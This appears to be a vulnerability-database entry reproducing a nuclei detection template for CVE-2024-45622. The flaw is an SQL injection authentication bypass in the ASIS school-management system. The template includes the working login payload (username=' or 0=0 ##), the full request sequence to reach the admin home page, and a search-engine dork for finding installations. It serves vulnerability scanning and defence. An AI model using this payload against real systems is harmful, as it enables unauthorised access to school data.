Lucene search
K

ASIS - SQL Injection Authentication Bypass

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 40 Views

ASIS - SQL Injection Auth Bypass in Aplikasi Sistem Sekola

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
ASIS 3.2.0 SQL Injection Vulnerability
11 Sep 202400:00
zdt
GithubExploit
Ntemplatesbyxit
7 May 202615:36
githubexploit
Circl
CVE-2024-45622
2 Sep 202422:14
circl
CNNVD
ASIS 安全漏洞
2 Sep 202400:00
cnnvd
CVE
CVE-2024-45622
2 Sep 202400:00
cve
Cvelist
CVE-2024-45622
2 Sep 202400:00
cvelist
NVD
CVE-2024-45622
2 Sep 202419:15
nvd
Packet Storm
ASIS 3.2.0 SQL Injection
5 Sep 202400:00
packetstorm
Positive Technologies
PT-2024-31712 · Unknown +1 · Codeigniter 3 +1
2 Sep 202400:00
ptsecurity
RedhatCVE
CVE-2024-45622
23 May 202510:30
redhatcve
Rows per page
id: CVE-2024-45622

info:
  name: ASIS - SQL Injection Authentication Bypass
  author: s4e-io
  severity: critical
  description: |
    ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.
  impact: |
    Unauthenticated attackers can bypass authentication via SQL injection to gain unauthorized access to the ASIS system.
  remediation: |
    Update ASIS to a version later than 3.2.0 that patches the SQL injection vulnerability.
  reference:
    - https://github.com/atoz-chevara/cve/blob/main/2024/ASIS_AplikasiSistemSekolah_Using_CodeIgniter3-SQL_Injection_Authentication_Bypass.md
    - https://packetstormsecurity.com/files/181355/ASIS-3.2.0-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2024-45622
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-45622
    cwe-id: CWE-89
    epss-score: 0.36297
    epss-percentile: 0.98292
    cpe: cpe:2.3:a:asis:asis:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: asis
    product: asis
    google-query: "ASIS | Aplikasi Sistem Sekolah"
  tags: cve,cve2024,asis,auth-bypass,sqli,vuln

variables:
  pass: "{{rand_base(10)}}"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /asispanel/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"<title>ASIS | Aplikasi Sistem Sekolah </title>")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /asispanel/login/cek HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=%27+or+0%3D0+%23%23&password={{pass}}&submit=&submit=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 303'
        condition: and
        internal: true

  - raw:
      - |
        GET /asispanel/home HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Logout")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100e216a7457c7c602616775c046312633deb97533f4c9a48e8b5e8db65320d99dd022023ecb025393f89ef0938ad2626717ff43a55a9fc9805ee531cad8e90758a9e60:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.36297
SSVC
40